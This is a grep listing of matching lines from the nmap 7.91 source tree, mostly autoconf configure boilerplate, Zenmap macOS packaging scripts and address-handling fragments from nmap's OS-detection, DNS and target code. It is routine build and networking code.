nmap-7.91+dfsg1/ncat/configure:3799:  as_ac_Header=`$as_echo "ac_cv_header_$ac_header" | $as_tr_sh`
nmap-7.91+dfsg1/ncat/configure-3800-ac_fn_c_check_header_mongrel "$LINENO" "$ac_header" "$as_ac_Header" "$ac_includes_default"
##############################################
nmap-7.91+dfsg1/ncat/configure-3802-  cat >>confdefs.h <<_ACEOF
nmap-7.91+dfsg1/ncat/configure:3803:#define `$as_echo "HAVE_$ac_header" | $as_tr_cpp` 1
nmap-7.91+dfsg1/ncat/configure-3804-_ACEOF
##############################################
nmap-7.91+dfsg1/ncat/configure-4009-do :
nmap-7.91+dfsg1/ncat/configure:4010:  as_ac_var=`$as_echo "ac_cv_func_$ac_func" | $as_tr_sh`
nmap-7.91+dfsg1/ncat/configure-4011-ac_fn_c_check_func "$LINENO" "$ac_func" "$as_ac_var"
##############################################
nmap-7.91+dfsg1/ncat/configure-4013-  cat >>confdefs.h <<_ACEOF
nmap-7.91+dfsg1/ncat/configure:4014:#define `$as_echo "HAVE_$ac_func" | $as_tr_cpp` 1
nmap-7.91+dfsg1/ncat/configure-4015-_ACEOF
##############################################
nmap-7.91+dfsg1/ncat/configure-4210-do :
nmap-7.91+dfsg1/ncat/configure:4211:  as_ac_Header=`$as_echo "ac_cv_header_$ac_header" | $as_tr_sh`
nmap-7.91+dfsg1/ncat/configure-4212-ac_fn_c_check_header_mongrel "$LINENO" "$ac_header" "$as_ac_Header" "$ac_includes_default"
##############################################
nmap-7.91+dfsg1/ncat/configure-4214-  cat >>confdefs.h <<_ACEOF
nmap-7.91+dfsg1/ncat/configure:4215:#define `$as_echo "HAVE_$ac_header" | $as_tr_cpp` 1
nmap-7.91+dfsg1/ncat/configure-4216-_ACEOF
##############################################
nmap-7.91+dfsg1/ncat/configure-4263-ac_save_IFS=$IFS; IFS=','
nmap-7.91+dfsg1/ncat/configure:4264:set dummy `echo "$ac_cv_func_select_args" | sed 's/\*/\*/g'`
nmap-7.91+dfsg1/ncat/configure-4265-IFS=$ac_save_IFS
##############################################
nmap-7.91+dfsg1/ncat/configure-4512-do :
nmap-7.91+dfsg1/ncat/configure:4513:  as_ac_var=`$as_echo "ac_cv_func_$ac_func" | $as_tr_sh`
nmap-7.91+dfsg1/ncat/configure-4514-ac_fn_c_check_func "$LINENO" "$ac_func" "$as_ac_var"
##############################################
nmap-7.91+dfsg1/ncat/configure-4516-  cat >>confdefs.h <<_ACEOF
nmap-7.91+dfsg1/ncat/configure:4517:#define `$as_echo "HAVE_$ac_func" | $as_tr_cpp` 1
nmap-7.91+dfsg1/ncat/configure-4518-_ACEOF
##############################################
nmap-7.91+dfsg1/ncat/configure-4825-do :
nmap-7.91+dfsg1/ncat/configure:4826:  as_ac_Header=`$as_echo "ac_cv_header_$ac_header" | $as_tr_sh`
nmap-7.91+dfsg1/ncat/configure-4827-ac_fn_c_check_header_mongrel "$LINENO" "$ac_header" "$as_ac_Header" "$ac_includes_default"
##############################################
nmap-7.91+dfsg1/ncat/configure-4829-  cat >>confdefs.h <<_ACEOF
nmap-7.91+dfsg1/ncat/configure:4830:#define `$as_echo "HAVE_$ac_header" | $as_tr_cpp` 1
nmap-7.91+dfsg1/ncat/configure-4831-_ACEOF
##############################################
nmap-7.91+dfsg1/ncat/configure-5160-do :
nmap-7.91+dfsg1/ncat/configure:5161:  as_ac_Header=`$as_echo "ac_cv_header_$ac_header" | $as_tr_sh`
nmap-7.91+dfsg1/ncat/configure-5162-ac_fn_c_check_header_mongrel "$LINENO" "$ac_header" "$as_ac_Header" "$ac_includes_default"
##############################################
nmap-7.91+dfsg1/ncat/configure-5164-  cat >>confdefs.h <<_ACEOF
nmap-7.91+dfsg1/ncat/configure:5165:#define `$as_echo "HAVE_$ac_header" | $as_tr_cpp` 1
nmap-7.91+dfsg1/ncat/configure-5166-_ACEOF
##############################################
nmap-7.91+dfsg1/ncat/configure-5410-  ac_script='s/\$U\././;s/\.o$//;s/\.obj$//'
nmap-7.91+dfsg1/ncat/configure:5411:  ac_i=`$as_echo "$ac_i" | sed "$ac_script"`
nmap-7.91+dfsg1/ncat/configure-5412-  # 2. Prepend LIBOBJDIR.  When used with automake>=1.10 LIBOBJDIR
##############################################
nmap-7.91+dfsg1/ncat/configure-5477-if test -z "$BASH_VERSION$ZSH_VERSION" \
nmap-7.91+dfsg1/ncat/configure:5478:    && (test "X`print -r -- $as_echo`" = "X$as_echo") 2>/dev/null; then
nmap-7.91+dfsg1/ncat/configure-5479-  as_echo='print -r --'
nmap-7.91+dfsg1/ncat/configure-5480-  as_echo_n='print -rn --'
nmap-7.91+dfsg1/ncat/configure:5481:elif (test "X`printf %s $as_echo`" = "X$as_echo") 2>/dev/null; then
nmap-7.91+dfsg1/ncat/configure-5482-  as_echo='printf %s\n'
##############################################
nmap-7.91+dfsg1/ncat/configure-5484-else
nmap-7.91+dfsg1/ncat/configure:5485:  if test "X`(/usr/ucb/echo -n -n $as_echo) 2>/dev/null`" = "X-n $as_echo"; then
nmap-7.91+dfsg1/ncat/configure-5486-    as_echo_body='eval /usr/ucb/echo -n "$1$as_nl"'
##############################################
nmap-7.91+dfsg1/ncat/configure-5494-	expr "X$arg" : "X\\(.*\\)$as_nl";
nmap-7.91+dfsg1/ncat/configure:5495:	arg=`expr "X$arg" : ".*$as_nl\\(.*\\)"`;;
nmap-7.91+dfsg1/ncat/configure-5496-      esac;
##############################################
nmap-7.91+dfsg1/ncat/configure-5571-# ----------------------------------------
nmap-7.91+dfsg1/ncat/configure:5572:# Output "`basename $0`: error: ERROR" to stderr. If LINENO and LOG_FD are
nmap-7.91+dfsg1/ncat/configure-5573-# provided, also output the error to LOG_FD, referencing LINENO. Then exit the
##############################################
nmap-7.91+dfsg1/ncat/configure-5643-  {
nmap-7.91+dfsg1/ncat/configure:5644:    as_val=`expr "$@" || test $? -eq 1`
nmap-7.91+dfsg1/ncat/configure-5645-  }
##############################################
nmap-7.91+dfsg1/ncat/configure-5747-      case $as_dir in #(
nmap-7.91+dfsg1/ncat/configure:5748:      *\'*) as_qdir=`$as_echo "$as_dir" | sed "s/'/'\\\\\\\\''/g"`;; #'(
nmap-7.91+dfsg1/ncat/configure-5749-      *) as_qdir=$as_dir;;
##############################################
nmap-7.91+dfsg1/ncat/configure-5878-cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1
nmap-7.91+dfsg1/ncat/configure:5879:ac_cs_config="`$as_echo "$ac_configure_args" | sed 's/^ //; s/[\\""\`\$]/\\\\&/g'`"
nmap-7.91+dfsg1/ncat/configure-5880-ac_cs_version="\\
##############################################
nmap-7.91+dfsg1/ncat/configure-5901-  --*=?*)
nmap-7.91+dfsg1/ncat/configure:5902:    ac_option=`expr "X$1" : 'X\([^=]*\)='`
nmap-7.91+dfsg1/ncat/configure:5903:    ac_optarg=`expr "X$1" : 'X[^=]*=\(.*\)'`
nmap-7.91+dfsg1/ncat/configure-5904-    ac_shift=:
##############################################
nmap-7.91+dfsg1/ncat/configure-5906-  --*=)
nmap-7.91+dfsg1/ncat/configure:5907:    ac_option=`expr "X$1" : 'X\([^=]*\)='`
nmap-7.91+dfsg1/ncat/configure-5908-    ac_optarg=
##############################################
nmap-7.91+dfsg1/ncat/configure-5930-    case $ac_optarg in
nmap-7.91+dfsg1/ncat/configure:5931:    *\'*) ac_optarg=`$as_echo "$ac_optarg" | sed "s/'/'\\\\\\\\''/g"` ;;
nmap-7.91+dfsg1/ncat/configure-5932-    '') as_fn_error $? "missing file argument" ;;
##############################################
nmap-7.91+dfsg1/ncat/configure-5938-    case $ac_optarg in
nmap-7.91+dfsg1/ncat/configure:5939:    *\'*) ac_optarg=`$as_echo "$ac_optarg" | sed "s/'/'\\\\\\\\''/g"` ;;
nmap-7.91+dfsg1/ncat/configure-5940-    esac
##############################################
nmap-7.91+dfsg1/ncat/configure-6059-fi
nmap-7.91+dfsg1/ncat/configure:6060:ac_cs_awk_cr=`$AWK 'BEGIN { print "a\rb" }' </dev/null 2>/dev/null`
nmap-7.91+dfsg1/ncat/configure-6061-if test "$ac_cs_awk_cr" = "a${ac_cr}b"; then
##############################################
nmap-7.91+dfsg1/ncat/configure-6076-  as_fn_error $? "could not make $CONFIG_STATUS" "$LINENO" 5
nmap-7.91+dfsg1/ncat/configure:6077:ac_delim_num=`echo "$ac_subst_vars" | grep -c '^'`
nmap-7.91+dfsg1/ncat/configure-6078-ac_delim='%!_!# '
##############################################
nmap-7.91+dfsg1/ncat/configure-6082-
nmap-7.91+dfsg1/ncat/configure:6083:  ac_delim_n=`sed -n "s/.*$ac_delim\$/X/p" conf$$subs.awk | grep -c X`
nmap-7.91+dfsg1/ncat/configure-6084-  if test $ac_delim_n = $ac_delim_num; then
##############################################
nmap-7.91+dfsg1/ncat/configure-6220-for ac_last_try in false false :; do
nmap-7.91+dfsg1/ncat/configure:6221:  ac_tt=`sed -n "/$ac_delim/p" confdefs.h`
nmap-7.91+dfsg1/ncat/configure-6222-  if test -z "$ac_tt"; then
##############################################
nmap-7.91+dfsg1/ncat/configure-6352-      esac
nmap-7.91+dfsg1/ncat/configure:6353:      case $ac_f in *\'*) ac_f=`$as_echo "$ac_f" | sed "s/'/'\\\\\\\\''/g"`;; esac
nmap-7.91+dfsg1/ncat/configure-6354-      as_fn_append ac_file_inputs " '$ac_f'"
##############################################
nmap-7.91+dfsg1/ncat/configure-6411-*)
nmap-7.91+dfsg1/ncat/configure:6412:  ac_dir_suffix=/`$as_echo "$ac_dir" | sed 's|^\.[\\/]||'`
nmap-7.91+dfsg1/ncat/configure-6413-  # A ".." for each directory in $ac_dir_suffix.
nmap-7.91+dfsg1/ncat/configure:6414:  ac_top_builddir_sub=`$as_echo "$ac_dir_suffix" | sed 's|/[^\\/]*|/..|g;s|/||'`
nmap-7.91+dfsg1/ncat/configure-6415-  case $ac_top_builddir_sub in
##############################################
nmap-7.91+dfsg1/ncat/configure-6467-/@mandir@/p'
nmap-7.91+dfsg1/ncat/configure:6468:case `eval "sed -n \"\$ac_sed_dataroot\" $ac_file_inputs"` in
nmap-7.91+dfsg1/ncat/configure-6469-*datarootdir*) ac_datarootdir_seen=yes;;
##############################################
nmap-7.91+dfsg1/ncat/configure-6484-
nmap-7.91+dfsg1/ncat/configure:6485:# Neutralize VPATH when `$srcdir' = `.'.
nmap-7.91+dfsg1/ncat/configure-6486-# Shell code in configure.ac might set extrasub.
##############################################
nmap-7.91+dfsg1/ncat/configure-6511-test -z "$ac_datarootdir_hack$ac_datarootdir_seen" &&
nmap-7.91+dfsg1/ncat/configure:6512:  { ac_out=`sed -n '/\${datarootdir}/p' "$ac_tmp/out"`; test -n "$ac_out"; } &&
nmap-7.91+dfsg1/ncat/configure-6513-  { ac_out=`sed -n '/^[	 ]*datarootdir[	 ]*:*=/p' \
##############################################
nmap-7.91+dfsg1/zenmap/install_scripts/macosx/launcher.sh-2-
nmap-7.91+dfsg1/zenmap/install_scripts/macosx/launcher.sh:3:name=`basename "$0"`
nmap-7.91+dfsg1/zenmap/install_scripts/macosx/launcher.sh-4-tmp="$0"
nmap-7.91+dfsg1/zenmap/install_scripts/macosx/launcher.sh:5:tmp=`dirname "$tmp"`
nmap-7.91+dfsg1/zenmap/install_scripts/macosx/launcher.sh:6:tmp=`dirname "$tmp"`
nmap-7.91+dfsg1/zenmap/install_scripts/macosx/launcher.sh:7:bundle=`dirname "$tmp"`
nmap-7.91+dfsg1/zenmap/install_scripts/macosx/launcher.sh-8-bundle_contents="$bundle"/Contents
##############################################
nmap-7.91+dfsg1/zenmap/install_scripts/macosx/launcher.sh-40-  lang=`defaults read /Library/Preferences/.GlobalPreferences AppleLocale 2>/dev/null`
nmap-7.91+dfsg1/zenmap/install_scripts/macosx/launcher.sh:41:  export LANG="`echo $lang`.UTF-8"
nmap-7.91+dfsg1/zenmap/install_scripts/macosx/launcher.sh-42-fi
##############################################
nmap-7.91+dfsg1/zenmap/install_scripts/macosx/make-bundle.sh-14-BASE=$ZENMAP_DIST_DIR/$APP_NAME.app/Contents
nmap-7.91+dfsg1/zenmap/install_scripts/macosx/make-bundle.sh:15:SCRIPT_DIR=`dirname "$0"`
nmap-7.91+dfsg1/zenmap/install_scripts/macosx/make-bundle.sh-16-
##############################################
nmap-7.91+dfsg1/zenmap/zenmapGUI/ScanHostsView.py-73-# Used to sort hosts by address.
nmap-7.91+dfsg1/zenmap/zenmapGUI/ScanHostsView.py:74:def cmp_treemodel_addr(model, iter_a, iter_b):
nmap-7.91+dfsg1/zenmap/zenmapGUI/ScanHostsView.py-75-    addrs_a = treemodel_get_addrs_for_sort(model, iter_a)
##############################################
nmap-7.91+dfsg1/zenmap/zenmapGUI/ScanOpenPortsPage.py-100-
nmap-7.91+dfsg1/zenmap/zenmapGUI/ScanOpenPortsPage.py:101:def cmp_port_list_addr(model, iter_a, iter_b):
nmap-7.91+dfsg1/zenmap/zenmapGUI/ScanOpenPortsPage.py-102-    host_a = model.get_value(iter_a, 0)
##############################################
nmap-7.91+dfsg1/zenmap/zenmapGUI/ScanOpenPortsPage.py-106-
nmap-7.91+dfsg1/zenmap/zenmapGUI/ScanOpenPortsPage.py:107:def cmp_port_tree_addr(model, iter_a, iter_b):
nmap-7.91+dfsg1/zenmap/zenmapGUI/ScanOpenPortsPage.py-108-    host_a = model.get_value(iter_a, 0)
##############################################
nmap-7.91+dfsg1/zenmap/zenmapGUI/ScanOpenPortsPage.py-112-
nmap-7.91+dfsg1/zenmap/zenmapGUI/ScanOpenPortsPage.py:113:def cmp_host_list_addr(model, iter_a, iter_b):
nmap-7.91+dfsg1/zenmap/zenmapGUI/ScanOpenPortsPage.py-114-    host_a = model.get_value(iter_a, 2)
##############################################
nmap-7.91+dfsg1/zenmap/zenmapGUI/ScanOpenPortsPage.py-118-
nmap-7.91+dfsg1/zenmap/zenmapGUI/ScanOpenPortsPage.py:119:def cmp_host_tree_addr(model, iter_a, iter_b):
nmap-7.91+dfsg1/zenmap/zenmapGUI/ScanOpenPortsPage.py-120-    host_a = model.get_value(iter_a, 2)
##############################################
nmap-7.91+dfsg1/FPEngine.cc-1289-const struct sockaddr_storage *FPHost::getTargetAddress() {
nmap-7.91+dfsg1/FPEngine.cc:1290:  return this->target_host->TargetSockAddr();
nmap-7.91+dfsg1/FPEngine.cc-1291-}
##############################################
nmap-7.91+dfsg1/FPEngine.cc-1573-
nmap-7.91+dfsg1/FPEngine.cc:1574:  if (islocalhost(this->target_host->TargetSockAddr())) {
nmap-7.91+dfsg1/FPEngine.cc-1575-    /* scanning localhost */
##############################################
nmap-7.91+dfsg1/FPEngine.cc-1716-
nmap-7.91+dfsg1/FPEngine.cc:1717:    ip6 = make_tcp((struct sockaddr_in6 *) this->target_host->SourceSockAddr(),
nmap-7.91+dfsg1/FPEngine.cc:1718:      (struct sockaddr_in6 *) this->target_host->TargetSockAddr(),
nmap-7.91+dfsg1/FPEngine.cc-1719-      OSDETECT_FLOW_LABEL, TCP_DESCS[i].win, this->tcpSeqBase + i, get_random_u32(),
##############################################
nmap-7.91+dfsg1/FPEngine.cc-1746-  payload = new RawData();
nmap-7.91+dfsg1/FPEngine.cc:1747:  this->target_host->SourceSockAddr(&ss, &slen);
nmap-7.91+dfsg1/FPEngine.cc-1748-  ip6->setSourceAddress(ss6->sin6_addr);
nmap-7.91+dfsg1/FPEngine.cc:1749:  this->target_host->TargetSockAddr(&ss, &slen);
nmap-7.91+dfsg1/FPEngine.cc-1750-  ip6->setDestinationAddress(ss6->sin6_addr);
##############################################
nmap-7.91+dfsg1/FPEngine.cc-1779-  payload = new RawData();
nmap-7.91+dfsg1/FPEngine.cc:1780:  this->target_host->SourceSockAddr(&ss, &slen);
nmap-7.91+dfsg1/FPEngine.cc-1781-  ip6->setSourceAddress(ss6->sin6_addr);
nmap-7.91+dfsg1/FPEngine.cc:1782:  this->target_host->TargetSockAddr(&ss, &slen);
nmap-7.91+dfsg1/FPEngine.cc-1783-  ip6->setDestinationAddress(ss6->sin6_addr);
##############################################
nmap-7.91+dfsg1/FPEngine.cc-1816-    icmp6 = new ICMPv6Header();
nmap-7.91+dfsg1/FPEngine.cc:1817:    this->target_host->SourceSockAddr(&ss, &slen);
nmap-7.91+dfsg1/FPEngine.cc-1818-    ip6->setSourceAddress(ss6->sin6_addr);
nmap-7.91+dfsg1/FPEngine.cc:1819:    this->target_host->TargetSockAddr(&ss, &slen);
nmap-7.91+dfsg1/FPEngine.cc-1820-    ip6->setDestinationAddress(ss6->sin6_addr);
##############################################
nmap-7.91+dfsg1/FPEngine.cc-1846-  payload = new RawData();
nmap-7.91+dfsg1/FPEngine.cc:1847:  this->target_host->SourceSockAddr(&ss, &slen);
nmap-7.91+dfsg1/FPEngine.cc-1848-  ip6->setSourceAddress(ss6->sin6_addr);
nmap-7.91+dfsg1/FPEngine.cc:1849:  this->target_host->TargetSockAddr(&ss, &slen);
nmap-7.91+dfsg1/FPEngine.cc-1850-  ip6->setDestinationAddress(ss6->sin6_addr);
##############################################
nmap-7.91+dfsg1/FPEngine.cc-1870-      || (TCP_DESCS[i].dstport == CLSD && this->closed_port_tcp >= 0)) {
nmap-7.91+dfsg1/FPEngine.cc:1871:    ip6 = make_tcp((struct sockaddr_in6 *) this->target_host->SourceSockAddr(),
nmap-7.91+dfsg1/FPEngine.cc:1872:      (struct sockaddr_in6 *) this->target_host->TargetSockAddr(),
nmap-7.91+dfsg1/FPEngine.cc-1873-      OSDETECT_FLOW_LABEL, TCP_DESCS[i].win, this->tcpSeqBase + i, 0,
##############################################
nmap-7.91+dfsg1/FPEngine.cc-1895-
nmap-7.91+dfsg1/FPEngine.cc:1896:    ip6 = make_tcp((struct sockaddr_in6 *) this->target_host->SourceSockAddr(),
nmap-7.91+dfsg1/FPEngine.cc:1897:      (struct sockaddr_in6 *) this->target_host->TargetSockAddr(),
nmap-7.91+dfsg1/FPEngine.cc-1898-      OSDETECT_FLOW_LABEL, TCP_DESCS[i].win, this->tcpSeqBase + i, get_random_u32(),
##############################################
nmap-7.91+dfsg1/nmap_dns.cc-242-  HostElem(const std::string & name_, const sockaddr_storage & ip) :
nmap-7.91+dfsg1/nmap_dns.cc:243:    name(name_), addr(ip), cache_hits(0) {}
nmap-7.91+dfsg1/nmap_dns.cc-244-  ~HostElem() {}
##############################################
nmap-7.91+dfsg1/nmap_dns.cc-487-
nmap-7.91+dfsg1/nmap_dns.cc:488:  plen = DNS::Factory::buildReverseRequest(*req->targ->TargetSockAddr(), packet, maxlen);
nmap-7.91+dfsg1/nmap_dns.cc-489-
##############################################
nmap-7.91+dfsg1/nmap_dns.cc-602-
nmap-7.91+dfsg1/nmap_dns.cc:603:    if( !result.empty() && !sockaddr_storage_equal(&ip, tpreq->targ->TargetSockAddr()) )
nmap-7.91+dfsg1/nmap_dns.cc-604-      return 0;
##############################################
nmap-7.91+dfsg1/nmap_dns.cc-613-        tpreq->targ->setHostName(result.c_str());
nmap-7.91+dfsg1/nmap_dns.cc:614:        host_cache.add(* tpreq->targ->TargetSockAddr(), result);
nmap-7.91+dfsg1/nmap_dns.cc-615-      }
##############################################
nmap-7.91+dfsg1/nmap_dns.cc-835-      size_t sslen;
nmap-7.91+dfsg1/nmap_dns.cc:836:      o.SourceSockAddr(&ss, &sslen);
nmap-7.91+dfsg1/nmap_dns.cc:837:      nsock_iod_set_localaddr(serverI->nsd, &ss, sslen);
nmap-7.91+dfsg1/nmap_dns.cc-838-    }
##############################################
nmap-7.91+dfsg1/nmap_dns.cc-1100-    std::string res;
nmap-7.91+dfsg1/nmap_dns.cc:1101:    if (host_cache.lookup(*(*hostI)->TargetSockAddr(), res)) {
nmap-7.91+dfsg1/nmap_dns.cc-1102-      tpname = res.c_str();
##############################################
nmap-7.91+dfsg1/nmap_dns.cc-1178-
nmap-7.91+dfsg1/nmap_dns.cc:1179:      if (tpreq->targ->TargetSockAddr(&ss, &sslen) != 0)
nmap-7.91+dfsg1/nmap_dns.cc-1180-        fatal("Failed to get target socket address.");
##############################################
nmap-7.91+dfsg1/nmap_dns.cc-1225-    if (((currenths->flags & HOST_UP) || o.always_resolve) && !o.noresolve) {
nmap-7.91+dfsg1/nmap_dns.cc:1226:      if (currenths->TargetSockAddr(&ss, &sslen) != 0)
nmap-7.91+dfsg1/nmap_dns.cc-1227-        fatal("Failed to get target socket address.");
##############################################
nmap-7.91+dfsg1/ndiff/test-scans/anonymize.py-84-
nmap-7.91+dfsg1/ndiff/test-scans/anonymize.py:85:def repl_addr(match):
nmap-7.91+dfsg1/ndiff/test-scans/anonymize.py-86-    addr = match.group(0)
##############################################
nmap-7.91+dfsg1/tcpip.cc-1615-  addr_len = sizeof(addr);
nmap-7.91+dfsg1/tcpip.cc:1616:  target->TargetSockAddr(&addr, &addr_len);
nmap-7.91+dfsg1/tcpip.cc-1617-  if (sockaddr_storage_cmp(src, &addr) != 0)
##############################################
nmap-7.91+dfsg1/tcpip.cc-1662-  if (target->directlyConnected()) {
nmap-7.91+dfsg1/tcpip.cc:1663:    target->TargetSockAddr(&targetss, &sslen);
nmap-7.91+dfsg1/tcpip.cc-1664-  } else {
##############################################
nmap-7.91+dfsg1/tcpip.cc-1668-
nmap-7.91+dfsg1/tcpip.cc:1669:  if (getNextHopMAC(target->deviceFullName(), target->SrcMACAddress(), target->SourceSockAddr(), &targetss, mac)) {
nmap-7.91+dfsg1/tcpip.cc-1670-    target->setNextHopMACAddress(mac);
##############################################
nmap-7.91+dfsg1/tcpip.cc-1721-  if (o.spoofsource) {
nmap-7.91+dfsg1/tcpip.cc:1722:    o.SourceSockAddr(&spoofss, &spoofsslen);
nmap-7.91+dfsg1/tcpip.cc-1723-    return route_dst(dst, rnfo, o.device, &spoofss);
##############################################
nmap-7.91+dfsg1/output.cc-1665-                             bool isGoodFP, bool wrapit) const {
nmap-7.91+dfsg1/output.cc:1666:  return mergeFPs(this->FPs, this->numFPs, isGoodFP, currenths->TargetSockAddr(),
nmap-7.91+dfsg1/output.cc-1667-                  currenths->distance,
##############################################
nmap-7.91+dfsg1/output.cc-1789-  /* Write the SCAN line. */
nmap-7.91+dfsg1/output.cc:1790:  WriteSInfo(str, sizeof(str), isGoodFP, "6", currenths->TargetSockAddr(),
nmap-7.91+dfsg1/output.cc-1791-    currenths->distance, currenths->distance_calculation_method,
##############################################
nmap-7.91+dfsg1/output.cc-2328-    sslen = sizeof(addr);
nmap-7.91+dfsg1/output.cc:2329:    currenths->TargetSockAddr(&addr, &sslen);
nmap-7.91+dfsg1/output.cc-2330-    while (it != currenths->traceroute_hops.end()
##############################################
nmap-7.91+dfsg1/nmap-os-db-25127-
nmap-7.91+dfsg1/nmap-os-db:25128:# F5 BIG-IP ASM Virtual Edition
nmap-7.91+dfsg1/nmap-os-db-25129-Fingerprint F5 BIG-IP Application Security Manager firewall
##############################################
nmap-7.91+dfsg1/targets.cc-99-    if (!hostbatch[targetno]->SrcMACAddress()) {
nmap-7.91+dfsg1/targets.cc:100:      bool islocal = islocalhost(hostbatch[targetno]->TargetSockAddr());
nmap-7.91+dfsg1/targets.cc-101-      if (islocal) {
##############################################
nmap-7.91+dfsg1/targets.cc-263-  /* Different source address? */
nmap-7.91+dfsg1/targets.cc:264:  if (sockaddr_storage_cmp(targets[0]->SourceSockAddr(), target->SourceSockAddr()) != 0)
nmap-7.91+dfsg1/targets.cc-265-    return true;
##############################################
nmap-7.91+dfsg1/targets.cc-275-  for (i = 0; i < targets_sz; i++) {
nmap-7.91+dfsg1/targets.cc:276:    if (sockaddr_storage_cmp(targets[i]->TargetSockAddr(), target->TargetSockAddr()) == 0)
nmap-7.91+dfsg1/targets.cc-277-      return true;
##############################################
nmap-7.91+dfsg1/targets.cc-370-
nmap-7.91+dfsg1/targets.cc:371:  t->setTargetSockAddr(ss, sslen);
nmap-7.91+dfsg1/targets.cc-372-
##############################################
nmap-7.91+dfsg1/targets.cc-410-#endif
nmap-7.91+dfsg1/targets.cc:411:    t->setSourceSockAddr(&rnfo.srcaddr, sizeof(rnfo.srcaddr));
nmap-7.91+dfsg1/targets.cc-412-    if (hs->current_batch_sz == 0) /* Because later ones can have different src addy and be cut off group */
##############################################
nmap-7.91+dfsg1/macosx/README.md-67-* [make-bundle.sh](../zenmap/install_scripts/macosx/make-bundle.sh): This script builds a .app bundle. It must be run from the root of the Zenmap source tree. The finished bundle is put in `dist/Zenmap.app`.
nmap-7.91+dfsg1/macosx/README.md:68:* [zenmap.icns](../zenmap/install_scripts/macosx/zenmap.icns): The icon file for the bundle. It was created using the Icon Composer utility (`$ open -a "Icon Composer"`).
nmap-7.91+dfsg1/macosx/README.md-69-* [zenmap_auth.c](../zenmap/install_scripts/macosx/zenmap_auth.c): This is a simple wrapper program that attempts to run [launcher.sh](../zenmap/install_scripts/macosx/launcher.sh) with privileges.
##############################################
nmap-7.91+dfsg1/macosx/check_test.sh-17-while [ "$stop" = false ]; do
nmap-7.91+dfsg1/macosx/check_test.sh:18:    test=`ls -l /Volumes/${title}/ | wc -l`
nmap-7.91+dfsg1/macosx/check_test.sh-19-    if [ "$test" -eq $NB_FILES ]; then
##############################################
nmap-7.91+dfsg1/macosx/createdmg.sh-35-while [ "$stop" = false ]; do
nmap-7.91+dfsg1/macosx/createdmg.sh:36:    test=`ls -l /Volumes/${title}/ | wc -l`
nmap-7.91+dfsg1/macosx/createdmg.sh-37-    if [ "$test" -eq $NB_FILES ]; then
##############################################
nmap-7.91+dfsg1/nbase/getnameinfo.c-101-    } else {
nmap-7.91+dfsg1/nbase/getnameinfo.c:102:      he = gethostbyaddr((char *)&sin->sin_addr, sizeof(struct in_addr),
nmap-7.91+dfsg1/nbase/getnameinfo.c-103-                         AF_INET);
##############################################
nmap-7.91+dfsg1/nbase/acinclude.m4-93-    sa.sin_port = 0;
nmap-7.91+dfsg1/nbase/acinclude.m4:94:    sa.sin_addr.s_addr = inet_addr("127.0.0.1");
nmap-7.91+dfsg1/nbase/acinclude.m4-95-#ifdef SIN6_LEN
##############################################
nmap-7.91+dfsg1/nbase/nbase_addrset.c-386-/* Helper function to turn a sockaddr into an array of u32, used internally */
nmap-7.91+dfsg1/nbase/nbase_addrset.c:387:static int sockaddr_to_addr(const struct sockaddr *sa, u32 *addr)
nmap-7.91+dfsg1/nbase/nbase_addrset.c-388-{
##############################################
nmap-7.91+dfsg1/nbase/nbase_addrset.c-447-  u32 mask[4] = {0};
nmap-7.91+dfsg1/nbase/nbase_addrset.c:448:  if (!sockaddr_to_addr(sa, addr)) {
nmap-7.91+dfsg1/nbase/nbase_addrset.c-449-    log_debug("Unknown address family %u, address not inserted.\n", sa->sa_family);
##############################################
nmap-7.91+dfsg1/nbase/nbase_addrset.c-502-  u32 addr[4] = {0};
nmap-7.91+dfsg1/nbase/nbase_addrset.c:503:  if (!sockaddr_to_addr(sa, addr)) {
nmap-7.91+dfsg1/nbase/nbase_addrset.c-504-    log_debug("Unknown address family %u, cannot match.\n", sa->sa_family);
##############################################
nmap-7.91+dfsg1/nbase/configure-43-if test -z "$BASH_VERSION$ZSH_VERSION" \
nmap-7.91+dfsg1/nbase/configure:44:    && (test "X`print -r -- $as_echo`" = "X$as_echo") 2>/dev/null; then
nmap-7.91+dfsg1/nbase/configure-45-  as_echo='print -r --'
nmap-7.91+dfsg1/nbase/configure-46-  as_echo_n='print -rn --'
nmap-7.91+dfsg1/nbase/configure:47:elif (test "X`printf %s $as_echo`" = "X$as_echo") 2>/dev/null; then
nmap-7.91+dfsg1/nbase/configure-48-  as_echo='printf %s\n'
##############################################
nmap-7.91+dfsg1/nbase/configure-50-else
nmap-7.91+dfsg1/nbase/configure:51:  if test "X`(/usr/ucb/echo -n -n $as_echo) 2>/dev/null`" = "X-n $as_echo"; then
nmap-7.91+dfsg1/nbase/configure-52-    as_echo_body='eval /usr/ucb/echo -n "$1$as_nl"'
##############################################
nmap-7.91+dfsg1/nbase/configure-60-	expr "X$arg" : "X\\(.*\\)$as_nl";
nmap-7.91+dfsg1/nbase/configure:61:	arg=`expr "X$arg" : ".*$as_nl\\(.*\\)"`;;
nmap-7.91+dfsg1/nbase/configure-62-      esac;
##############################################
nmap-7.91+dfsg1/nbase/configure-197-  eval 'test \"x\$as_lineno_1'\$as_run'\" != \"x\$as_lineno_2'\$as_run'\" &&
nmap-7.91+dfsg1/nbase/configure:198:  test \"x\`expr \$as_lineno_1'\$as_run' + 1\`\" = \"x\$as_lineno_2'\$as_run'\"' || exit 1
nmap-7.91+dfsg1/nbase/configure-199-test \$(( 1 + 1 )) = 2 || exit 1"
##############################################
nmap-7.91+dfsg1/nbase/configure-324-      case $as_dir in #(
nmap-7.91+dfsg1/nbase/configure:325:      *\'*) as_qdir=`$as_echo "$as_dir" | sed "s/'/'\\\\\\\\''/g"`;; #'(
nmap-7.91+dfsg1/nbase/configure-326-      *) as_qdir=$as_dir;;
##############################################
nmap-7.91+dfsg1/nbase/configure-397-  {
nmap-7.91+dfsg1/nbase/configure:398:    as_val=`expr "$@" || test $? -eq 1`
nmap-7.91+dfsg1/nbase/configure-399-  }
##############################################
nmap-7.91+dfsg1/nbase/configure-404-# ----------------------------------------
nmap-7.91+dfsg1/nbase/configure:405:# Output "`basename $0`: error: ERROR" to stderr. If LINENO and LOG_FD are
nmap-7.91+dfsg1/nbase/configure-406-# provided, also output the error to LOG_FD, referencing LINENO. Then exit the
##############################################
nmap-7.91+dfsg1/nbase/configure-467-  eval 'test "x$as_lineno_1'$as_run'" != "x$as_lineno_2'$as_run'" &&
nmap-7.91+dfsg1/nbase/configure:468:  test "x`expr $as_lineno_1'$as_run' + 1`" = "x$as_lineno_2'$as_run'"' || {
nmap-7.91+dfsg1/nbase/configure-469-  # Blame Lee E. McMahon (1931-1989) for sed's syntax.  :-)
##############################################
